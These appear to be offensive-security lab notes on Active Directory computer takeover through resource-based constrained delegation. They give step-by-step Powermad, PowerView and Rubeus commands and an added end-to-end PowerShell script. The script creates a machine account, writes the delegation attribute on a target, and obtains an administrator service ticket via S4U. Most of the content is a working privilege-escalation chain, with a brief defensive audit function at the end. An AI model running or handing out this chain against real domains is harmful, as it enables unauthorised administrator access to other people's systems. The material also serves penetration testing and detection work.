https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution

    https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericall-genericwrite-write-on-computer

    • Principle
      By default an ordinary domain user may create up to 10 new computer accounts (the domain's ms-DS-MachineAccountQuota attribute).
      Setting the resource-based constrained delegation (RBCD) attribute msDS-AllowedToActOnBehalfOfOtherIdentity does not require Domain Admin rights.
      Any principal with write access to a computer object can set that object's RBCD attribute, so an ordinary domain user with such access can configure it.
    • Requirements
      Credentials of an ordinary domain user
      Domain controllers running Server 2012 or later (older DCs do not honour msDS-AllowedToActOnBehalfOfOtherIdentity)
      Write access to the target computer object (e.g. GenericAll, GenericWrite, WriteDacl, or WriteProperty on msDS-AllowedToActOnBehalfOfOtherIdentity)
    • Steps

    The test environment is an ordinary domain user logged on to a domain-joined computer.
    Create a computer account named testpc and obtain the SID of testpc$ (it is the trustee in the security descriptor written in the next step).

    1. import-module .\Powermad.ps1
    2. New-MachineAccount -MachineAccount testpc -Password $(ConvertTo-SecureString "Admin123" -AsPlainText -Force)
    3. dsquery.exe * -filter "(&(sAMAccountName=testpc$))" -limit 0 -attr *
    4. Read objectSid from the output; here it is S-1-5-21-4030334565-2237076002-3168552227-1603

    Configure the resource-based constrained delegation attribute on the target computer object (WIN-JSGIJOFK3T7)

    1. import-module .\Microsoft.ActiveDirectory.Management.dll   (the AD module is only needed if you write the attribute with Set-ADComputer instead of PowerView's Set-DomainObject below; RawSecurityDescriptor is a plain .NET class and needs no module)
    2. $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-4030334565-2237076002-3168552227-1603)"
    3. $SDBytes = New-Object byte[] ($SD.BinaryLength)
    4. $SD.GetBinaryForm($SDBytes, 0)
    5. Import-Module .\PowerSploit-master\PowerSploit.psm1
    6. Get-DomainComputer WIN-JSGIJOFK3T7 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
    7. Get-DomainComputer WIN-JSGIJOFK3T7 -Properties msds-allowedtoactonbehalfofotheridentity

    Once msDS-AllowedToActOnBehalfOfOtherIdentity is set, the target host can be attacked through resource-based constrained delegation: testpc$ performs S4U2self for any user (here administrator) and S4U2proxy to a service on the target, and the KDC issues a service ticket for that user because the target's attribute lists testpc$ as allowed to act on behalf of other identities.

    1. Convert the password to its Kerberos keys (the rc4_hmac value is the NT hash and depends on the password alone, so testpc vs. testpc$ makes no difference here; /user and /domain only affect the salt used for the AES keys)
    2. Rubeus.exe hash /user:testpc /password:Admin123 /domain:ddh.com
    3. Then use the testpc$ hash to run S4U2self (impersonating administrator) and S4U2proxy against the target's service and inject the resulting service ticket into the current session. This is a KDC-issued ticket obtained through delegation, not a forged silver ticket. The host part of /msdsspn must be the computer whose msDS-AllowedToActOnBehalfOfOtherIdentity was written above; /altservice can request additional services (host, http, ldap, ...) in the same run.
    4. Rubeus.exe s4u /user:testpc$ /rc4:E45A314C664D40A227F9540121D1A29D /impersonateuser:administrator /msdsspn:cifs/dm2008 /ptt
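    The whole procedure as one script, added here as an example and not part of the original page or of Powermad, PowerView or Rubeus. It uses the RSAT ActiveDirectory module and .NET security-descriptor classes in place of Powermad/PowerView, adds the checks for the two preconditions (machine account quota, DC version), reads the written attribute back and decodes it to the allowed SIDs (useful both to verify the write and, defensively, to audit hosts for RBCD entries), and cleans up afterwards. Assumed names: domain ddh.com, machine account testpc$, target computer WIN-JSGIJOFK3T7 (taken as the SPN host, which the page does not state), Rubeus at .\Rubeus.exe, and the `rc4_hmac` label in Rubeus hash output.

```powershell
# Added example: RBCD end-to-end with the RSAT ActiveDirectory module.
# Assumed (not from the page): ddh.com, testpc$, WIN-JSGIJOFK3T7 as SPN host, .\Rubeus.exe
Import-Module ActiveDirectory

function Test-RbcdPreconditions {
    # Precondition 1: quota that lets an ordinary user add computer accounts (default 10).
    $domain = Get-ADDomain
    $quota  = (Get-ADObject -Identity $domain.DistinguishedName `
                -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
    # Precondition 2: every DC must be Server 2012 or newer to honour the RBCD attribute.
    $dcs = Get-ADDomainController -Filter * | Select-Object HostName, OperatingSystem
    [pscustomobject]@{ MachineAccountQuota = $quota; DomainControllers = $dcs }
}

function New-RbcdMachineAccount {
    param([Parameter(Mandatory)][string]$Name,
          [Parameter(Mandatory)][securestring]$Password)
    # Same effect as Powermad's New-MachineAccount; returns the new account's SID.
    New-ADComputer -Name $Name -SamAccountName "$Name`$" -AccountPassword $Password -Enabled $true
    (Get-ADComputer -Identity "$Name`$").SID.Value
}

function Set-RbcdAllowedPrincipal {
    param([Parameter(Mandatory)][string]$TargetComputer,
          [Parameter(Mandatory)][string]$PrincipalSam)   # e.g. 'testpc$'
    # Writes msDS-AllowedToActOnBehalfOfOtherIdentity on the target; the cmdlet builds
    # the security descriptor for us. Needs write access to the target computer object.
    $principal = Get-ADComputer -Identity $PrincipalSam
    Set-ADComputer -Identity $TargetComputer -PrincipalsAllowedToDelegateToAccount $principal
}

function Get-RbcdAllowedPrincipals {
    param([Parameter(Mandatory)][string]$TargetComputer)
    $attr = 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    $val  = (Get-ADComputer -Identity $TargetComputer -Properties $attr).$attr
    if (-not $val) { return @() }               # attribute absent: no RBCD configured
    # The AD module returns an ActiveDirectorySecurity object; raw LDAP tools return bytes.
    $bytes = if ($val -is [System.DirectoryServices.ActiveDirectorySecurity]) {
                 $val.GetSecurityDescriptorBinaryForm() } else { [byte[]]$val }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $bytes, 0
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Each allow ACE trustee is a principal that may S4U2proxy to this host.
        $sid  = $ace.SecurityIdentifier
        $name = try { $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { '<unresolved>' }
        [pscustomobject]@{ Sid = $sid.Value; Name = $name; AceType = $ace.AceType; AccessMask = $ace.AccessMask }
    }
}

function Clear-RbcdAllowedPrincipals {
    param([Parameter(Mandatory)][string]$TargetComputer)
    Set-ADComputer -Identity $TargetComputer -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity'
}

# --- Usage with the page's names (ddh.com, testpc$, WIN-JSGIJOFK3T7) ---
Test-RbcdPreconditions
$sid = New-RbcdMachineAccount -Name 'testpc' -Password (ConvertTo-SecureString 'Admin123' -AsPlainText -Force)
Set-RbcdAllowedPrincipal -TargetComputer 'WIN-JSGIJOFK3T7' -PrincipalSam 'testpc$'
Get-RbcdAllowedPrincipals -TargetComputer 'WIN-JSGIJOFK3T7'   # expect one ACE whose Sid equals $sid

# Ticket step (external tool, same two Rubeus commands as above). The rc4_hmac line is
# parsed out of the hash output; its label is assumed from Rubeus' current output format.
$hashOut = & .\Rubeus.exe hash '/password:Admin123' '/user:testpc$' '/domain:ddh.com'
$rc4 = [regex]::Match(($hashOut -join "`n"), 'rc4_hmac\s*:\s*([0-9A-Fa-f]{32})').Groups[1].Value
# SPN host must be the computer whose attribute was written, here assumed to be WIN-JSGIJOFK3T7.
& .\Rubeus.exe s4u '/user:testpc$' "/rc4:$rc4" '/impersonateuser:administrator' '/msdsspn:cifs/WIN-JSGIJOFK3T7' '/ptt'

# Cleanup after the test: remove the delegation entry and the machine account.
Clear-RbcdAllowedPrincipals -TargetComputer 'WIN-JSGIJOFK3T7'
Remove-ADComputer -Identity 'testpc$' -Confirm:$false
```

    Get-RbcdAllowedPrincipals is the part worth keeping on the defensive side: run it over every computer object (Get-ADComputer -Filter *) and any host whose attribute resolves to a freshly created or unexpected machine account is a candidate RBCD takeover.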